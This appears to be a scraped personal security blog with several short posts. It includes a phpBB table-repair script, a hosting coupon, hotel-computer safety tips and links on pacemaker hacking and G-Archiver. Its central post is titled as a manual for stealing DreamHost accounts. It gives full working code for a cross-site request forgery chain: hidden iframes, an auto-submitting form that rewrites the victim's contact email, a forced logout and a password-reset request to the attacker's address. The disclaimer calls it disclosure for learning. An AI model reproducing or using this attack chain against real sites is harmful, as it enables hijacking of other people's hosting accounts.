<?php
//———————-//
// phpbb_topics    Bappear    //
//———————-//
include “config.php”;
$abc = mysql_connect($dbhost, $dbuser, $dbpasswd);
mysql_select_db($dbname);

$aaa = mysql_query(”SELECT ” . $table_prefix . “posts.topic_id, ” . $table_prefix . “posts.forum_id, ” . $table_prefix . “posts.poster_id, ” . $table_prefix . “posts.post_time, not ISNULL(” . $table_prefix . “vote_desc.topic_id) as vote_topic_id, (count(” . $table_prefix . “posts.post_id) - 1) as topic_replies, IF(ISNULL(” . $table_prefix . “posts_text.post_subject), ‘Generic Title’, ” . $table_prefix . “posts_text.post_subject) as post_subject, ” . $table_prefix . “posts_text.post_id as topic_first_post_id, max(” . $table_prefix . “posts_text.post_id) as topic_last_post_id FROM `” . $table_prefix . “posts` LEFT JOIN ” . $table_prefix . “vote_desc ON ” . $table_prefix . “posts.topic_id = ” . $table_prefix . “vote_desc.topic_id LEFT JOIN ” . $table_prefix . “posts_text ON ” . $table_prefix . “posts.post_id = ” . $table_prefix . “posts_text.post_id GROUP BY ” . $table_prefix . “posts.topic_id;”, $abc);

while($data = mysql_fetch_array($aaa)) {

mysql_query(”INSERT INTO `” . $table_prefix . “topics` (`topic_id`, `forum_id`, `topic_title`, `topic_poster`, `topic_time`, `topic_views`, `topic_replies`, `topic_status`, `topic_vote`, `topic_type`, `topic_first_post_id`, `topic_last_post_id`, `topic_moved_id`) VALUES(” . $data['topic_id'] . “, ” . $data['forum_id'] . “, ‘” . mysql_real_escape_string($data['post_subject']) . “‘, ” . $data['poster_id'] . “, ” . $data['post_time'] . “, 0, ” . $data['topic_replies'] . “, 0, ” . $data['vote_topic_id'] . “, 0, ” . $data['topic_first_post_id'] . “, ” . $data['topic_last_post_id'] . “, 0);”);
}

mysql_free_result($aaa);
mysql_close($abc);
?>

this script was created by one of my forums member, Nachum.

Thanks - It was a real save.

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note - you must use the logout button and then it will not work on your account ).

A legal notice - If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual - how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So - How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>

   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>

   3:  <a1>This page can not be found</a1>

   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>

   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">

   6:  </iframe>

   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>

   2:  <body>

   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">

   4:  <input type=hidden name=tab value="contact">

   5:  <input type=hidden name="command" value="submit_edit">

   6:      <tr valign=top>

   7:          <td id=txt align=right><b>Name:</b></td>

   8:          <td><select name="prefix" id=frm>

   9:                  <option value=""></option>

  10:                  </select>

  11:                  <input name="first" value="somename" size="8" id=frm>

  12:                  <input name="middle" size="1" id=frm>

  13:                  <input name="last" value="somefamily" size="8" id=frm>

  14:                  <select name="suffix" id=frm>

  15:                  <option value=""></option>

  16:                  </select>

  17:          </td>

  18:      </tr>

  19:      <tr valign=top>

  20:  

  21:          <td id=txt align=right><b>Address:</b></td>

  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>

  23:                  <input name="street2" size=30 id=frm><br>

  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>

  25:  </select>

  26:          </td>

  27:      </tr>

  28:      <tr valign=top>

  29:          <td id=txt align=right><b>Email:</b></td>

  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>

  31:      </tr>

  32:      <tr>

  33:          <td id=txt align=right><b>Phone:</b></td>

  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>

  35:      </tr>

  36:      <tr>

  37:          <td id=txt align=right><b>Fax:</b>*</td>

  38:          <td><input name="fax" size=30 id=frm></td>

  39:      </tr>

  40:      <tr>

  41:          <td id=txt align=right><b>IM:</b>*</td>

  42:          <td><input name="chat" size=30 id=frm></td>

  43:      </tr>

  44:      <tr>

  45:          <td id=txt align=right><b>URL:</b>*</td>

  46:          <td><input name="url" size=30 id=frm></td>

  47:      </tr>

  48:      <tr>

  49:          <td></td>

  50:          <td id=txt>*optional information</td>

  51:      </tr>

  52:      <tr>

  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>

  54:      </tr>

  55:  </form>

  56:  <script>

  57:  document.asd.submit();

  58:  </script>

  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">

  60:  </body>

  61:  <html>

as you can see - this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>

   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">

   3:  </iframe>

   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>

   5:  </html>

as you can see - info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>

   2:  <body onload="document.getElementById('2').submit()">

   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">

   4:  <input type="hidden" name="return_url" value="" />

   5:  <input type="hidden" name="email_pwd_submitted" value="1" />

   6:  <input name="email" class="text" value="somemail@somedomain.com">

   7:  <input type="submit" class="button" value="Email me my password!">

   8:  </form>

   9:  </body>

  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it - 4 pages and you can get any dreamhost account..

I think most of you will find it intresting.

Lett me know if you think something is missing

http://securityfeed.info/

I use their services for more than 6 months now.

In the first weeks - I was suffering from sluggish connection, low speed and more problems.

In the past 3 or 4 month I am very happy with their servers and connection. Look like they solved many of their problems.

If you need a hosting service and you don’t want to be bothered with space, bandwith and domains restrictions - you can check their hosting.

If you want Dreamhost hosting with the best discount - I created a kickass coupon for it:

You’ll get 50$ discount and a free IP! It is the best deal you can get from them

If you want it - just enter KICKASS as the Promo Code.

What you’ll get (beside the discount and the free IP)?

• 500 GB Disk Storage
• 5 TB Monthly Bandwidth
• Plus many more features!

It can be very useful to see what other sites are sitting on your site’s IP.

When you are using a shared host for your site or blog, you basically risk your site.

If an attacker is targeting other sites on the same server, his attack can hit you as well as other sites on the server.

More other sites on the hosting server = More chances your site can be hit in their attack process.

So how can you check the sites on your hosting server?

You can do it using this tool:

http://www.yougetsignal.com/tools/web-sites-on-web-server/

My mom placed an order for hotel and flights to Eilat but she and my dad couldn’t go.

My wife and me got the vacation.. thanks mom and dad

When we arrived into the hotel, we upgraded our vacation to VIP and therefore we can get into the business lounge.

We enjoy free food and drinks, breakfast in the 12′th floor with an amazing view.

The business lounge has two computers in it with a (more or less) fast Internet connection.

When I got to the computers both had their Internet browsers open.

One quick look and I saw that one computer was on Google. The guy who surf there before me left his Gmail account logged on.. You don’t even need to hack into his Gmail

The other computer was in stock’s site. A few clicks “back” in the browser’s toolbar and I was logged as him.

It didn’t end there…

A quick review of the computer show that it is full with spywares, Trojan horses, and other malware. The computer had Spy Sweeper installed but it didn’t help..

So how can you work safely?

1. Don’t leave your account logged in when you finish using it. It is better if you will not get into sites that require User and Password.

2. Delete the browser history, temp files and cookies when you finish.

3. Close the Internet Browser. Restart the computer. (If the policies do not allow this you can disconnect the computer from the electricity – it works too )

4. Best if you disconnect the computer from the network and use your laptop.

5. Work with cellular modem and don’t rely on the hotel.

In my Hebrew blog I wrote once how to bypass Captive Portals.

Got some fire when I wrote that..

Security researchers managed to hack to defibrillator and pacemaker using Wireless (Yes, it is possible to hack it when the stuff is in one’s chest).

When they made POC the researchers put a defibrillator in a bag full of meat and managed to make it give a strong electric shock.

Scary..

The research here:

http://www.secure-medicine.org/PervasiveIMDSecurity.pdf

The developer forgot to mention that G-Archiver also give him the ability to hack into your Gmail account.

read about it here:

http://www.codinghorror.com/blog/archives/001072.html

You go, buy this awesome laptop and then what?

1. You throw it to the garbage?

2. You are suspected as a terrorist when trying to take it to flight (And loosing your flight)?

3. All of the above..